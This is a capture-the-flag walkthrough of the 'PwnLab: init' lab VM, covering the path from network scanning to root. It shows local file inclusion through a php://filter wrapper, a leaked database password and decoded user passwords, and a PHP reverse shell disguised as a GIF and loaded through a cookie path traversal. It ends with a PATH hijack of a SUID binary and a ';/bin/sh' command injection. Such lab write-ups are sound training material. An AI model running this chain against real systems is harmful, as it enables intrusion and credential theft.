♟️PWNLAB

Welcome to "PwnLab: init", a Boot2Root virtual machine. . The purpose of this CTF is to get root and read the flag.

1. Reconnaissance

Scanning the network to find vulnerable machine's IP

arp-scan -l 

Interface: enp0s3, type: EN10MB, MAC: 08:00:27:02:ad:e6, IPv4: 192.168.10.22
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1	52:54:00:12:35:00	QEMU
192.168.10.2	52:54:00:12:35:00	QEMU
192.168.10.3	08:00:27:ba:30:20	PCS Systemtechnik GmbH
192.168.10.14	08:00:27:94:3a:a6	PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.432 seconds (105.26 hosts/sec). 4 responded

We find the IP of the vulnerable machine to be 192.168.10.14

2. Scanning

2.1 Nmap

Using nmap to find the open ports and their services

nmap -Pn -p- -A 192.168.10.14  

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 09:56 IST
Nmap scan report for 192.168.10.14
Host is up (0.0016s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34589/tcp6  status
|   100024  1          43502/udp   status
|   100024  1          45450/tcp   status
|_  100024  1          60511/udp6  status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 38
|   Capabilities flags: 63487
|   Some Capabilities: FoundRows, Support41Auth, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, IgnoreSigpipes, LongPassword, LongColumnFlag, SupportsLoadDataLocal, InteractiveClient, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, ODBCClient, SupportsTransactions, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: k5dvHBRW>p:l6f~giZem
|_  Auth Plugin Name: mysql_native_password
45450/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:94:3A:A6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.59 ms 192.168.10.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.99 seconds

We find open ports 22, 80, 111, 3306, 45450 with services ssh, rpcbind, mysql, and a virtual box running respectively.

2.2 Directory enumeration

Enumerating the web directories using gobuster

gobuster dir -u http://192.168.10.14 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt 

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.14
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/30 09:58:58 Starting gobuster in directory enumeration mode
===============================================================
/upload               (Status: 301) [Size: 315] [--> http://192.168.10.14/upload/]
/images               (Status: 301) [Size: 315] [--> http://192.168.10.14/images/]
/server-status        (Status: 403) [Size: 301]                                   
                                                                                  
===============================================================
2022/03/30 09:59:19 Finished
===============================================================

We find an interesting directory /upload

2.3 Vulnerability scanning

Enumerating vulnerable services using niko

nikto -h 192.168.10.14 

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.10.14
+ Target Hostname:    192.168.10.14
+ Target Port:        80
+ Start Time:         2022-03-30 10:02:03 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/images/".
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ Cookie PHPSESSID created without the httponly flag
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2022-03-30 10:02:31 (GMT5.5) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We get a mention of /config.php file which could contain the database IDs and passwords

3. Initial Foothold

3.1 Local File Inclusion

Accessing the webpage, we see that there are three links that can be accessed : Home, Login, and Upload
As we access each of them we see that the url gets appended with /?page=name For eg: If we go to Login page, we see the url change from http://192.168.10.14 to http://192.168.10.14/?page=login and similarly for upload
This is a misconfiguration know as Local File Inclusion (LFI) and it allows an attacker to manipulate the target’s web server by including malicious files remotely or even access sensitive files present onto that server. You can read more about LFI here
When trying to access config.php directly by appending it to the url(http://192.168.10.14/?page=config) and also by adding a null byte (http://192.168.10.14/?page=config%00), does not yield any results
Then we try base64 encoding using a php wrapper: http://192.168.10.14/?page=php://filter/read=convert.base64-encode/resource=config, which gives us the base64 encode config.php page

Decoding it, we get the login credentials for the mysq database

echo "PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+" | base64 -d

<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>#

3.2 Dumping credentials

Dumping the database using the credentials root : H4u%QJ_H99 obtained from the config.php file for possible usernames and/or password

mysql -h 192.168.10.14 -u root -p                                                             
Enter password: 

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 62
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;

+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.002 sec)

MySQL [(none)]> use Users;

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

MySQL [Users]> show tables;

+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.003 sec)

MySQL [Users]> select * from users;

+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.002 sec)

We get 3 users kent, mike and kane and their base64 encode passwords
Decoding them, we get possible credentials for login in to the webpage and/or the box
kent : JWzXuBJJNy mike : SIfdsTEn6I kane : iSv5Ym2GRo
Using any of the credentials, we can login to the web portal which will take you to the Upload page.

3.3 Reverse shell

Trying to upload a php-reverse-shell.php reverse shell from pentestmonkey (Make sure to change the IP and port)

We find that there are certain restricting in uploading files. It accept only images files
We can now rename .php extension of the reverse shell to .gif ; php-reverse-shell.gif
Also add the header GIF 98 at the start of the file to edit the magic byte (the first byte that identified the type of the file) to make it seem like a .gif file , from a text editor
Uploading the modified reverse shell, it goes through

we can find the uploaded file by going to /upload directory

Navigating to our uploaded GIF file, produces an error

There seems to be more filters in place

3.4 Filter Bypass

In order to find out how files are processed, we need the source code.
Getting index.php source from http://192.168.10.14/?page=php://filter/read=convert.base64-encode/resource=index and base64 decoding it

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
	if (isset($_GET['page']))
	{
		include($_GET['page'].".php");
	}
	else
	{
		echo "Use this server to upload and share image files inside the intranet";
	}
?>
</center>
</body>
</html>

Here we see that, there is an attribute lang which, when passed to the cookie, can be used for multilingual support. As this function is not yet implemented, we need to set any other language manually through the cookie
There is an include() function, so there might be another possible LFI. It takes in a parameter of lang=anypath in the cookie value.
Capturing the upload file in burpsuit and modifying the cookie value to include the path of our uploaded reverse shell.
- Cookie: lang=../upload/3208fd203ca8fdfa13bc98a4832c1396.gif
Burp Request :

Starting nc in the attacker system to capture the shell and forwarding the modified request in burp.

nc -lvnp 1234

58m 59s
listening on [any] 1234 ...
connect to [192.168.10.22] from (UNKNOWN) [192.168.10.14] 53444
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
 17:52:30 up 30 min,  0 users,  load average: 0.00, 0.01, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Stabilizing the shell

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@pwnlab:/$ ^Z
[1]  + 2766 suspended  nc -lvnp 1234

~ ❯ stty raw -echo;fg                                                                                                 ✘ TSTP 4m 44s  

[1]  + 2766 continued  nc -lvnp 1234
                                    reset                               
reset: unknown terminal type unknown

Terminal type? xterm-256color

www-data@pwnlab:/$ whoami
www-data

We are logged in as www-data

4. Privilege Escalation

4.1 SUID

We can try to switch users with the credentials obtained from the database.
We are able to switch to user kane with the credentials kane : iSv5Ym2GRo
sudo -l does not give any results as sudo is disabled in the box.

kane@pwnlab:/home/mike$ sudo -l

bash: sudo: command not found

Using SUID bit to switch to other user. -> A file with SUID always executes as the user who owns the file, regardless of the user passing the command
find / -perm -04000 -type f -ls 2>/dev/null shows us the files with SUID bit set for the current user.

kane@pwnlab:~$ find / -perm -04000 -type f -ls 2>/dev/null
  3603   36 -rwsr-xr-x   1 root     root        34684 Mar 29  2015 /bin/mount
  4989   40 -rwsr-xr-x   1 root     root        38868 Nov 19  2015 /bin/su
  3604   28 -rwsr-xr-x   1 root     root        26344 Mar 29  2015 /bin/umount
 18810   96 -rwsr-xr-x   1 root     root        96760 Aug 13  2014 /sbin/mount.nfs
 27221    8 -rwsr-sr-x   1 mike     mike         5148 Mar 17  2016 /home/kane/msgmike
  5009   40 -rwsr-xr-x   1 root     root        38740 Nov 19  2015 /usr/bin/newgrp
   354   52 -rwsr-xr-x   1 root     root        52344 Nov 19  2015 /usr/bin/chfn
 17895   52 -rwsr-sr-x   1 daemon   daemon      50644 Sep 30  2014 /usr/bin/at
   358   52 -rwsr-xr-x   1 root     root        53112 Nov 19  2015 /usr/bin/passwd
 18898   96 -rwsr-sr-x   1 root     mail        96192 Feb 11  2015 /usr/bin/procmail
   355   44 -rwsr-xr-x   1 root     root        43576 Nov 19  2015 /usr/bin/chsh
   357   80 -rwsr-xr-x   1 root     root        78072 Nov 19  2015 /usr/bin/gpasswd
 11725    8 -rwsr-xr-x   1 root     root         5372 Feb 24  2014 /usr/lib/eject/dmcrypt-get-device
  2813   12 -rwsr-xr-x   1 root     root         9540 Feb 11  2016 /usr/lib/pt_chown
 18078  356 -rwsr-xr--   1 root     messagebus   362672 Aug  2  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 18859  552 -rwsr-xr-x   1 root     root       562536 Jan 13  2016 /usr/lib/openssh/ssh-keysign
 17980 1060 -rwsr-xr-x   1 root     root      1085236 Mar 13  2016 /usr/sbin/exim4

Files at /usr/bin and /usr/lib might not help us in privesc via SUID. There is another interesting file msgmike at /home/kane
Checking the file type using file

kane@pwnlab:/$ cd /home/kane

kane@pwnlab:~$ file msgmike

msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped

The file is an executable file.
Executing the file gives us an error

kane@pwnlab:~$ ./msgmike             
cat: /home/mike/msg.txt: No such file or directory

4.2 PATH Variable.

From the error shown above, we see that the executable is trying to read a file called msg.txt using the cat command.
- In order to execute any Linux command, it checks the PATH variable for paths of the command. If the command is not found in the first location, it moves on to the next and so on. Read more about it here
Checking the PATH variable as well as the location of the cat command

kane@pwnlab:~$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

kane@pwnlab:~$ which cat
/bin/cat

We can see that the cat command is in the third location (/bin) of the PATH variable.
It checks the first two locations and moves on as it does not find the cat command there.
In order to exploit the PATH variable, we need to provide a pseudo cat command which can spawn a shell when called. And its path should be before the original path of the cat command in the PATH variable for it to get executed first.
Creating an executable file named cat in the current directory, which will spawn a bash shell.

kane@pwnlab:~$ echo "/bin/bash" > cat

kane@pwnlab:~$ chmod +x cat

Exporting the current directory path to the beginning of the PATH variable.

kane@pwnlab:~$ export PATH=./:$PATH 

kane@pwnlab:~$ echo $PATH
./:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Now there is a cat command at the first location of the PATH variable, so it will get executed first when the command is called, and thus we get a shell as user mike.

kane@pwnlab:~$ ./msgmike 

mike@pwnlab:~$

We became the user mike because the owner of the file msgmike with SUID set was mike

4.3 Command Injection

We find another vulnerable executable at mike's home folder called msg2root with SUID set and owner root

mike@pwnlab:~$ cd /home/mike

mike@pwnlab:/home/mike$ ls
msg2root

mike@pwnlab:/home/mike$ file msg2root 
msg2root: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=60bf769f8fbbfd406c047f698b55d2668fae14d3, not stripped

mike@pwnlab:/home/mike$ ls -la
total 28
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile

Executing msg2root

mike@pwnlab:/home/mike$ ./msg2root 

Message for root:

It asks for some user input
Running strings on msg2root

mike@pwnlab:/home/mike$ strings msg2root 
==================================================================================
Message for root: 
/bin/echo %s >> /root/messages.txt
==================================================================================

We find that any command the user inputs is passed to the /bin/echo command and eventually, appended to that messages.txt.Here command injection is possible.
We can directly pass in the command ;/bin/sh to execute and spawn a shell as root we use ; to break out of the echo command.

mike@pwnlab:/home/mike$ ./msg2root 
Message for root: ;/bin/sh

whoami
root

We are ROOT
Viewing flag.txt

cd /root

cat flag.txt

PreviousNode NextSolid State

Last updated 3 years ago